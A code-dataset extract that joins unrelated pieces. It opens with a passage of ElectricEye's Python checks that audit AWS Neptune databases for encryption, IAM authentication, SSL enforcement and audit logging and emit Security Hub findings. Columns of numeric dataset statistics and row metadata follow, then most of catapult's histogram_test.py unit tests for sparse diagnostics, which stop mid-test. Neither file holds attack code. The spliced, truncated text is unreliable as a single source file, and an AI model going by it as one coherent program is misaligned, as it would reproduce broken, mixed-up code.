neptuneInstanceArn = str(instances["DBInstanceArn"])
neptuneDbId = str(instances["DBInstanceIdentifier"])
storageEncryptionCheck = str(instances["StorageEncrypted"])
iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
if storageEncryptionCheck == "False":
finding = {
"SchemaVersion": "2018-10-08",
"Id": neptuneInstanceArn + "/neptune-instance-storage-encryption-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": neptuneInstanceArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "HIGH"},
"Confidence": 99,
"Title": "[Neptune.2] Neptune database instace storage should be encrypted",
"Description": "Neptune database instance "
+ neptuneDbId
+ " does not have storage encryption enabled. Refer to the remediation instructions to remediate this behavior",
"Remediation": {
"Recommendation": {
"Text": "For more information on Neptune storage encryption and how to configure it refer to the Enabling Encryption for a Neptune DB Instance section of the Amazon Neptune User Guide",
"Url": "https://docs.aws.amazon.com/neptune/latest/userguide/encrypt.html#encrypt-enable",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsNeptuneInstance",
"Id": neptuneInstanceArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {"Other": {"InstanceId": neptuneDbId}},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.DS-1",
"NIST SP 800-53 MP-8",
"NIST SP 800-53 SC-12",
"NIST SP 800-53 SC-28",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.8.2.3",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
else:
finding = {
"SchemaVersion": "2018-10-08",
"Id": neptuneInstanceArn + "/neptune-instance-storage-encryption-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": neptuneInstanceArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[Neptune.2] Neptune database instace storage should be encrypted",
"Description": "Neptune database instance "
+ neptuneDbId
+ " has storage encryption enabled.",
"Remediation": {
"Recommendation": {
"Text": "For more information on Neptune storage encryption and how to configure it refer to the Enabling Encryption for a Neptune DB Instance section of the Amazon Neptune User Guide",
"Url": "https://docs.aws.amazon.com/neptune/latest/userguide/encrypt.html#encrypt-enable",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsNeptuneInstance",
"Id": neptuneInstanceArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {"Other": {"InstanceId": neptuneDbId}},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.DS-1",
"NIST SP 800-53 MP-8",
"NIST SP 800-53 SC-12",
"NIST SP 800-53 SC-28",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.8.2.3",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
@registry.register_check("neptune")
def neptune_instance_iam_authentication_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[Neptune.3] Neptune database instaces storage should use IAM Database Authentication"""
neptune_instances = describe_db_instances(cache)
for instances in neptune_instances["DBInstances"]:
neptuneInstanceArn = str(instances["DBInstanceArn"])
neptuneDbId = str(instances["DBInstanceIdentifier"])
iamDbAuthCheck = str(instances["IAMDatabaseAuthenticationEnabled"])
iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
if iamDbAuthCheck == "False":
finding = {
"SchemaVersion": "2018-10-08",
"Id": neptuneInstanceArn + "/neptune-instance-iam-db-auth-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": neptuneInstanceArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[Neptune.3] Neptune database instaces storage should use IAM Database Authentication",
"Description": "Neptune database instance "
+ neptuneDbId
+ " does not use IAM Database Authentication. Refer to the remediation instructions to remediate this behavior",
"Remediation": {
"Recommendation": {
"Text": "For more information on Neptune IAM Database Authentication and how to configure it refer to the Neptune Database Authentication Using IAM section of the Amazon Neptune User Guide",
"Url": "https://docs.aws.amazon.com/neptune/latest/userguide/iam-auth.html",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsNeptuneInstance",
"Id": neptuneInstanceArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {"Other": {"InstanceId": neptuneDbId}},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.AC-6",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-2",
"NIST SP 800-53 AC-3",
"NIST SP 800-53 AC-16",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-24",
"NIST SP 800-53 IA-1",
"NIST SP 800-53 IA-2",
"NIST SP 800-53 IA-4",
"NIST SP 800-53 IA-5",
"NIST SP 800-53 IA-8",
"NIST SP 800-53 PE-2",
"NIST SP 800-53 PS-3",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.7.1.1",
"ISO 27001:2013 A.9.2.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
else:
finding = {
"SchemaVersion": "2018-10-08",
"Id": neptuneInstanceArn + "/neptune-instance-iam-db-auth-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": neptuneInstanceArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[Neptune.3] Neptune database instaces storage should use IAM Database Authentication",
"Description": "Neptune database instance "
+ neptuneDbId
+ " uses IAM Database Authentication.",
"Remediation": {
"Recommendation": {
"Text": "For more information on Neptune IAM Database Authentication and how to configure it refer to the Neptune Database Authentication Using IAM section of the Amazon Neptune User Guide",
"Url": "https://docs.aws.amazon.com/neptune/latest/userguide/iam-auth.html",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsNeptuneInstance",
"Id": neptuneInstanceArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {"Other": {"InstanceId": neptuneDbId}},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.AC-6",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-2",
"NIST SP 800-53 AC-3",
"NIST SP 800-53 AC-16",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-24",
"NIST SP 800-53 IA-1",
"NIST SP 800-53 IA-2",
"NIST SP 800-53 IA-4",
"NIST SP 800-53 IA-5",
"NIST SP 800-53 IA-8",
"NIST SP 800-53 PE-2",
"NIST SP 800-53 PS-3",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.7.1.1",
"ISO 27001:2013 A.9.2.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
@registry.register_check("neptune")
def neptune_cluster_parameter_ssl_enforcement_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[Neptune.4] Neptune cluster parameter groups should enforce SSL connections to Neptune databases"""
response = neptune.describe_db_cluster_parameter_groups()
for parametergroup in response["DBClusterParameterGroups"]:
parameterGroupName = str(parametergroup["DBClusterParameterGroupName"])
parameterGroupArn = str(parametergroup["DBClusterParameterGroupArn"])
response = neptune.describe_db_cluster_parameters(
DBClusterParameterGroupName=parameterGroupName
)
for parameters in response["Parameters"]:
if str(parameters["ParameterName"]) == "neptune_enforce_ssl":
sslEnforcementCheck = str(parameters["ParameterValue"])
iso8601Time = (
datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
)
if sslEnforcementCheck == "0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": parameterGroupArn
+ "/neptune-cluster-param-group-ssl-enforcement-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": parameterGroupArn,
"AwsAccountId": awsAccountId,
"Types": ["Software and Configuration Checks/AWS Security Best Practices"],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[Neptune.4] Neptune cluster parameter groups should enforce SSL connections to Neptune databases",
"Description": "Neptune cluster parameter group "
+ parameterGroupName
+ " does not enforce SSL connections. Refer to the remediation instructions to remediate this behavior",
"Remediation": {
"Recommendation": {
"Text": "For more information on enforcing SSL/HTTPS connections to Neptune instances refer to the Encryption in Transit: Connecting to Neptune Using SSL/HTTPS section of the Amazon Neptune User Guide.",
"Url": "https://docs.aws.amazon.com/neptune/latest/userguide/security-ssl.html",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsNeptuneParameterGroup",
"Id": parameterGroupArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {"Other": {"ParameterGroupName": parameterGroupName}},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.DS-2",
"NIST SP 800-53 SC-8",
"NIST SP 800-53 SC-11",
"NIST SP 800-53 SC-12",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.8.2.3",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
"ISO 27001:2013 A.13.2.3",
"ISO 27001:2013 A.14.1.2",
"ISO 27001:2013 A.14.1.3",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
else:
finding = {
"SchemaVersion": "2018-10-08",
"Id": parameterGroupArn
+ "/neptune-cluster-param-group-ssl-enforcement-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": parameterGroupArn,
"AwsAccountId": awsAccountId,
"Types": ["Software and Configuration Checks/AWS Security Best Practices"],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[Neptune.4] Neptune cluster parameter groups should enforce SSL connections to Neptune databases",
"Description": "Neptune cluster parameter group "
+ parameterGroupName
+ " enforces SSL connections.",
"Remediation": {
"Recommendation": {
"Text": "For more information on enforcing SSL/HTTPS connections to Neptune instances refer to the Encryption in Transit: Connecting to Neptune Using SSL/HTTPS section of the Amazon Neptune User Guide.",
"Url": "https://docs.aws.amazon.com/neptune/latest/userguide/security-ssl.html",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsNeptuneParameterGroup",
"Id": parameterGroupArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {"Other": {"ParameterGroupName": parameterGroupName}},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.DS-2",
"NIST SP 800-53 SC-8",
"NIST SP 800-53 SC-11",
"NIST SP 800-53 SC-12",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.8.2.3",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
"ISO 27001:2013 A.13.2.3",
"ISO 27001:2013 A.14.1.2",
"ISO 27001:2013 A.14.1.3",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
else:
pass
@registry.register_check("neptune")
def neptune_cluster_parameter_audit_log_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[Neptune.5] Neptune cluster parameter groups should enforce audit logging for Neptune databases"""
response = neptune.describe_db_cluster_parameter_groups()
for parametergroup in response["DBClusterParameterGroups"]:
parameterGroupName = str(parametergroup["DBClusterParameterGroupName"])
parameterGroupArn = str(parametergroup["DBClusterParameterGroupArn"])
response = neptune.describe_db_cluster_parameters(
DBClusterParameterGroupName=parameterGroupName
)
for parameters in response["Parameters"]:
if str(parameters["ParameterName"]) == "neptune_enable_audit_log":
auditLogCheck = str(parameters["ParameterValue"])
iso8601Time = (
datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
)
if auditLogCheck == "0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": parameterGroupArn
+ "/neptune-cluster-param-group-audit-logging-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": parameterGroupArn,
"AwsAccountId": awsAccountId,
"Types": ["Software and Configuration Checks/AWS Security Best Practices"],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[Neptune.5] Neptune cluster parameter groups should enforce audit logging for Neptune databases",
"Description": "Neptune cluster parameter group "
+ parameterGroupName
+ " does not enforce audit logging. Refer to the remediation instructions to remediate this behavior",
"Remediation": {
"Recommendation": {
"Text": "For more information on audit logging for Neptune instances refer to the Enabling Neptune Audit Logs section of the Amazon Neptune User Guide.",
"Url": "https://docs.aws.amazon.com/neptune/latest/userguide/auditing.html#auditing-enable",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsNeptuneParameterGroup",
"Id": parameterGroupArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {"Other": {"ParameterGroupName": parameterGroupName}},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF DE.AE-3",
"NIST SP 800-53 AU-6",
"NIST SP 800-53 CA-7",
"NIST SP 800-53 IR-4",
"NIST SP 800-53 IR-5",
"NIST SP 800-53 IR-8",
"NIST SP 800-53 SI-4",
"AICPA TSC CC7.2",
"ISO 27001:2013 A.12.4.1",
"ISO 27001:2013 A.16.1.7",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
else:
finding = {
"SchemaVersion": "2018-10-08",
"Id": parameterGroupArn
+ "/neptune-cluster-param-group-audit-logging-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": parameterGroupArn,
"AwsAccountId": awsAccountId,
"Types": ["Software and Configuration Checks/AWS Security Best Practices"],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[Neptune.5] Neptune cluster parameter groups should enforce audit logging for Neptune databases",
"Description": "Neptune cluster parameter group "
+ parameterGroupName
+ " enforces audit logging.",
"Remediation": {
"Recommendation": {
"Text": "For more information on audit logging for Neptune instances refer to the Enabling Neptune Audit Logs section of the Amazon Neptune User Guide.",
"Url": "https://docs.aws.amazon.com/neptune/latest/userguide/auditing.html#auditing-enable",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsNeptuneParameterGroup",
"Id": parameterGroupArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {"Other": {"ParameterGroupName": parameterGroupName}},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF DE.AE-3",
"NIST SP 800-53 AU-6",
"NIST SP 800-53 CA-7",
"NIST SP 800-53 IR-4",
"NIST SP 800-53 IR-5",
"NIST SP 800-53 IR-8",
"NIST SP 800-53 SI-4",
"AICPA TSC CC7.2",
"ISO 27001:2013 A.12.4.1",
"ISO 27001:2013 A.16.1.7",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
else:
pass
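# A minimal driver sketch for the checks defined above. ElectricEye's real
# runner lives in eeauditor and discovers checks through the CheckRegister
# decorator; the loop below is only an illustration that each check is a
# generator of Security Hub finding dicts, and the account/region values are
# placeholders.
def _run_neptune_checks(aws_account_id="111111111111", aws_region="us-east-1", aws_partition="aws"):
    cache = {}
    findings = []
    for check in (
        neptune_instance_multi_az_check,
        neptune_instance_storage_encryption_check,
        neptune_instance_iam_authentication_check,
        neptune_cluster_parameter_ssl_enforcement_check,
        neptune_cluster_parameter_audit_log_check,
    ):
        findings.extend(check(cache, aws_account_id, aws_region, aws_partition))
    return findings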
| 52.821101
| 235
| 0.471443
| 2,705
| 34,545
| 5.995194
| 0.116821
| 0.021459
| 0.032188
| 0.039341
| 0.90399
| 0.902941
| 0.902941
| 0.899673
| 0.894
| 0.884319
| 0
| 0.053244
| 0.42805
| 34,545
| 654
| 236
| 52.821101
| 0.767537
| 0.03714
| 0
| 0.828756
| 0
| 0.033926
| 0.381487
| 0.049699
| 0
| 0
| 0
| 0
| 0
| 1
| 0.009693
| false
| 0.011309
| 0.004847
| 0
| 0.017771
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
221e7d5ca31f5875d5f9f621df32b4e91a43d552
| 26,363
|
py
|
Python
|
dashboard/dashboard/models/histogram_test.py
|
PLSV/catapult
|
88e5b1f40c89c4b80d3dd56a722936d07f222a55
|
[
"BSD-3-Clause"
] | null | null | null |
dashboard/dashboard/models/histogram_test.py
|
PLSV/catapult
|
88e5b1f40c89c4b80d3dd56a722936d07f222a55
|
[
"BSD-3-Clause"
] | null | null | null |
dashboard/dashboard/models/histogram_test.py
|
PLSV/catapult
|
88e5b1f40c89c4b80d3dd56a722936d07f222a55
|
[
"BSD-3-Clause"
] | null | null | null |
# Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
import json
import sys
from dashboard.common import testing_common
from dashboard.common import utils
from dashboard.models import histogram
from tracing.value.diagnostics import generic_set
from tracing.value.diagnostics import reserved_infos
class SparseDiagnosticTest(testing_common.TestCase):
"""Test case for functions in SparseDiagnostic."""
def setUp(self):
super(SparseDiagnosticTest, self).setUp()
self.SetCurrentUser('foo@bar.com', is_admin=True)
def _AddMockData(self, test_key):
data_samples = {
'owners': [
{
'type': 'GenericSet',
'guid': '1',
'values': ['1']
},
{
'type': 'GenericSet',
'guid': '1',
'values': ['2']
},
{
'type': 'GenericSet',
'guid': '1',
'values': ['3']
},
],
'bugs': [
{
'type': 'GenericSet',
'guid': '1',
'values': ['a']
},
{
'type': 'GenericSet',
'guid': '1',
'values': ['b']
},
{
'type': 'GenericSet',
'guid': '1',
'values': ['c']
},
]
}
for k, diagnostic_samples in data_samples.items():
for i, sample in enumerate(diagnostic_samples):
start_revision = i * 10
end_revision = (i + 1) * 10 - 1
if i == len(diagnostic_samples) - 1:
end_revision = sys.maxsize
e = histogram.SparseDiagnostic(
data=sample,
test=test_key,
start_revision=start_revision,
end_revision=end_revision,
name=k,
internal_only=False)
e.put()
def testFixupDiagnostics_Middle_FixesRange(self):
test_key = utils.TestKey('Chromium/win7/foo')
self._AddMockData(test_key)
data = {'type': 'GenericSet', 'guid': '1', 'values': ['10']}
e = histogram.SparseDiagnostic(
data=data,
test=test_key,
start_revision=5,
end_revision=sys.maxsize,
name='owners',
internal_only=False)
e.put()
histogram.SparseDiagnostic.FixDiagnostics(test_key).get_result()
expected = {
'owners': [(0, 4), (5, 9), (10, 19), (20, sys.maxsize)],
'bugs': [(0, 9), (10, 19), (20, sys.maxsize)],
}
diags = histogram.SparseDiagnostic.query().fetch()
for d in diags:
self.assertIn((d.start_revision, d.end_revision), expected[d.name])
expected[d.name].remove((d.start_revision, d.end_revision))
self.assertEqual(0, len(expected['owners']))
self.assertEqual(0, len(expected['bugs']))
def testFixupDiagnostics_End_FixesRange(self):
test_key = utils.TestKey('Chromium/win7/foo')
self._AddMockData(test_key)
data = {'type': 'GenericSet', 'guid': '1', 'values': ['10']}
e = histogram.SparseDiagnostic(
data=data,
test=test_key,
start_revision=100,
end_revision=sys.maxsize,
name='owners',
internal_only=False)
e.put()
histogram.SparseDiagnostic.FixDiagnostics(test_key).get_result()
expected = {
'owners': [(0, 9), (10, 19), (20, 99), (100, sys.maxsize)],
'bugs': [(0, 9), (10, 19), (20, sys.maxsize)],
}
diags = histogram.SparseDiagnostic.query().fetch()
for d in diags:
self.assertIn((d.start_revision, d.end_revision), expected[d.name])
expected[d.name].remove((d.start_revision, d.end_revision))
self.assertEqual(0, len(expected['owners']))
self.assertEqual(0, len(expected['bugs']))
def testFixupDiagnostics_DifferentTestPath_NoChange(self):
test_key1 = utils.TestKey('Chromium/win7/1')
test_key2 = utils.TestKey('Chromium/win7/2')
self._AddMockData(test_key1)
self._AddMockData(test_key2)
data = {'type': 'GenericSet', 'guid': '1', 'values': ['10']}
e = histogram.SparseDiagnostic(
data=data,
test=test_key1,
start_revision=5,
end_revision=sys.maxsize,
name='owners',
internal_only=False)
e.put()
histogram.SparseDiagnostic.FixDiagnostics(test_key2).get_result()
expected = {
'owners': [(0, 9), (10, 19), (20, sys.maxsize)],
'bugs': [(0, 9), (10, 19), (20, sys.maxsize)],
}
diags = histogram.SparseDiagnostic.query(
histogram.SparseDiagnostic.test == test_key2).fetch()
for d in diags:
self.assertIn((d.start_revision, d.end_revision), expected[d.name])
expected[d.name].remove((d.start_revision, d.end_revision))
self.assertEqual(0, len(expected['owners']))
self.assertEqual(0, len(expected['bugs']))
def testFixupDiagnostics_NotUnique_NoChange(self):
test_key = utils.TestKey('Chromium/win7/foo')
self._AddMockData(test_key)
data = {'type': 'GenericSet', 'guid': '1', 'values': ['1']}
e = histogram.SparseDiagnostic(
data=data,
test=test_key,
start_revision=5,
end_revision=sys.maxsize,
name='owners',
internal_only=False)
e.put()
histogram.SparseDiagnostic.FixDiagnostics(test_key).get_result()
expected = {
'owners': [(0, 9), (10, 19), (20, sys.maxsize)],
'bugs': [(0, 9), (10, 19), (20, sys.maxsize)],
}
diags = histogram.SparseDiagnostic.query(
histogram.SparseDiagnostic.test == test_key).fetch()
for d in diags:
self.assertIn((d.start_revision, d.end_revision), expected[d.name])
expected[d.name].remove((d.start_revision, d.end_revision))
self.assertEqual(0, len(expected['owners']))
self.assertEqual(0, len(expected['bugs']))
def testGetMostRecentDataByNames_ReturnAllData(self):
data_samples = [{
'type': 'GenericSet',
'guid': 'eb212e80-db58-4cbd-b331-c2245ecbb826',
'values': ['alice@chromium.org']
}, {
'type': 'GenericSet',
'guid': 'eb212e80-db58-4cbd-b331-c2245ecbb827',
'values': ['abc']
}]
test_key = utils.TestKey('Chromium/win7/foo')
entity = histogram.SparseDiagnostic(
data=data_samples[0],
test=test_key,
start_revision=1,
end_revision=sys.maxsize,
id=data_samples[0]['guid'],
name=reserved_infos.OWNERS.name)
entity.put()
entity = histogram.SparseDiagnostic(
data=data_samples[1],
test=test_key,
start_revision=1,
end_revision=sys.maxsize,
id=data_samples[1]['guid'],
name=reserved_infos.BUG_COMPONENTS.name)
entity.put()
lookup_result = histogram.SparseDiagnostic.GetMostRecentDataByNamesSync(
test_key,
set([reserved_infos.OWNERS.name, reserved_infos.BUG_COMPONENTS.name]))
self.assertEqual(
lookup_result.get(reserved_infos.OWNERS.name).get('values'),
['alice@chromium.org'])
self.assertEqual(
lookup_result.get(reserved_infos.BUG_COMPONENTS.name).get('values'),
['abc'])
def testGetMostRecentDataByNames_ReturnsNoneIfNoneFound(self):
data_sample = {
'type': 'GenericSet',
'guid': 'eb212e80-db58-4cbd-b331-c2245ecbb826',
'values': ['alice@chromium.org']
}
test_key = utils.TestKey('Chromium/win7/foo')
entity = histogram.SparseDiagnostic(
data=data_sample,
test=test_key,
start_revision=1,
end_revision=sys.maxsize,
id=data_sample['guid'],
name=reserved_infos.OWNERS.name)
entity.put()
lookup_result = histogram.SparseDiagnostic.GetMostRecentDataByNamesSync(
test_key,
set([reserved_infos.OWNERS.name, reserved_infos.BUG_COMPONENTS.name]))
self.assertEqual(
lookup_result.get(reserved_infos.OWNERS.name).get('values'),
['alice@chromium.org'])
self.assertIsNone(lookup_result.get(reserved_infos.BUG_COMPONENTS.name))
def testGetMostRecentDataByNames_ReturnsNoneIfNoName(self):
data_sample = {'guid': 'abc', 'osName': 'linux', 'type': 'DeviceInfo'}
test_key = utils.TestKey('Chromium/win7/foo')
entity = histogram.SparseDiagnostic(
data=json.dumps(data_sample),
test=test_key,
start_revision=1,
end_revision=sys.maxsize,
id=data_sample['guid'])
entity.put()
lookup_result = histogram.SparseDiagnostic.GetMostRecentDataByNamesSync(
test_key,
set([reserved_infos.OWNERS.name, reserved_infos.BUG_COMPONENTS.name]))
self.assertIsNone(lookup_result.get(reserved_infos.OWNERS.name))
self.assertIsNone(lookup_result.get(reserved_infos.BUG_COMPONENTS.name))
def testGetMostRecentDataByNames_ToleratesDuplicateName(self):
data_samples = [{
'type': 'GenericSet',
'guid': 'eb212e80-db58-4cbd-b331-c2245ecbb826',
'values': ['alice@chromium.org']
}, {
'type': 'GenericSet',
'guid': 'eb212e80-db58-4cbd-b331-c2245ecbb827',
'values': ['bob@chromium.org']
}]
test_key = utils.TestKey('Chromium/win7/foo')
entity = histogram.SparseDiagnostic(
data=data_samples[0],
test=test_key,
start_revision=1,
end_revision=sys.maxsize,
id=data_samples[0]['guid'],
name=reserved_infos.OWNERS.name)
entity.put()
entity = histogram.SparseDiagnostic(
data=data_samples[1],
test=test_key,
start_revision=2,
end_revision=sys.maxsize,
id=data_samples[1]['guid'],
name=reserved_infos.OWNERS.name)
entity.put()
# TODO(crbug.com/877809): assertRaises
lookup_result = histogram.SparseDiagnostic.GetMostRecentDataByNamesSync(
test_key, set([reserved_infos.OWNERS.name]))
self.assertEqual(
lookup_result.get(reserved_infos.OWNERS.name).get('values'),
data_samples[1]['values'])
def _CreateGenericDiagnostic(self,
name,
values,
test_key,
start_revision,
end_revision=sys.maxsize):
d = generic_set.GenericSet([values])
e = histogram.SparseDiagnostic(
id=d.guid,
data=d.AsDict(),
name=name,
test=test_key,
start_revision=start_revision,
end_revision=end_revision)
return e
def _AddGenericDiagnostic(self,
name,
values,
test_key,
start_revision,
end_revision=sys.maxsize):
e = self._CreateGenericDiagnostic(name, values, test_key, start_revision,
end_revision)
ek = e.put()
suite_key = utils.TestKey('/'.join(test_key.id().split('/')[:3]))
histogram.HistogramRevisionRecord.GetOrCreate(suite_key,
start_revision).put()
histogram.SparseDiagnostic.FixDiagnostics(test_key).get_result()
return ek
def _CheckExpectations(self, diagnostic, guid_mapping, expected):
q = histogram.SparseDiagnostic.query()
q = q.order(histogram.SparseDiagnostic.end_revision)
sparse = q.fetch()
    # Check that the mapping is correct: if there is one, it should point to a
    # diagnostic with a valid range and the same data.
sparse_by_guid = dict((s.key.id(), s) for s in sparse)
if guid_mapping:
mapped_diagnostic = guid_mapping[diagnostic.key.id()]
existing_diagnostic = sparse_by_guid[mapped_diagnostic['guid']]
self.assertFalse(existing_diagnostic.IsDifferent(diagnostic))
      # We check that the start position is within the range, but not the end,
      # since the end is set to sys.maxsize and gets capped during insertion.
self.assertTrue(
existing_diagnostic.start_revision <= diagnostic.start_revision)
self.assertTrue(
existing_diagnostic.end_revision >= diagnostic.start_revision)
for d in sparse:
if not isinstance(d.data, dict):
continue
self.assertIn((d.start_revision, d.end_revision, d.data['values']),
expected)
expected.remove((d.start_revision, d.end_revision, d.data['values']))
self.assertFalse(expected)
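  # In the tests below, each expectation tuple passed to _CheckExpectations is
  # (start_revision, end_revision, values) for one stored diagnostic.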
def testFindOrInsertDiagnostics_Latest_Same(self):
test_key = utils.TestKey('M/B/S')
self._AddGenericDiagnostic('foo', 'm1', test_key, 1)
e = self._CreateGenericDiagnostic('foo', 'm1', test_key, 10)
guid_mapping = (
histogram.SparseDiagnostic.FindOrInsertDiagnostics(
[e], test_key, e.start_revision, e.start_revision).get_result())
self._CheckExpectations(e, guid_mapping, [
(1, sys.maxsize, [u'm1']),
])
def testFindOrInsertDiagnostics_Latest_Different(self):
test_key = utils.TestKey('M/B/S')
self._AddGenericDiagnostic('foo', 'm1', test_key, 1)
e = self._CreateGenericDiagnostic('foo', 'm2', test_key, 10)
guid_mapping = (
histogram.SparseDiagnostic.FindOrInsertDiagnostics(
[e], test_key, e.start_revision, e.start_revision).get_result())
self._CheckExpectations(e, guid_mapping, [
(1, 9, [u'm1']),
(10, sys.maxsize, [u'm2']),
])
def testFindOrInsertDiagnostics_Latest_Invalid(self):
test_key = utils.TestKey('M/B/S')
invalid = self._AddGenericDiagnostic('foo', 'm1', test_key, 1).get()
invalid.data = '{'
invalid.put()
e = self._CreateGenericDiagnostic('foo', 'm2', test_key, 10)
guid_mapping = (
histogram.SparseDiagnostic.FindOrInsertDiagnostics(
[e], test_key, e.start_revision, e.start_revision).get_result())
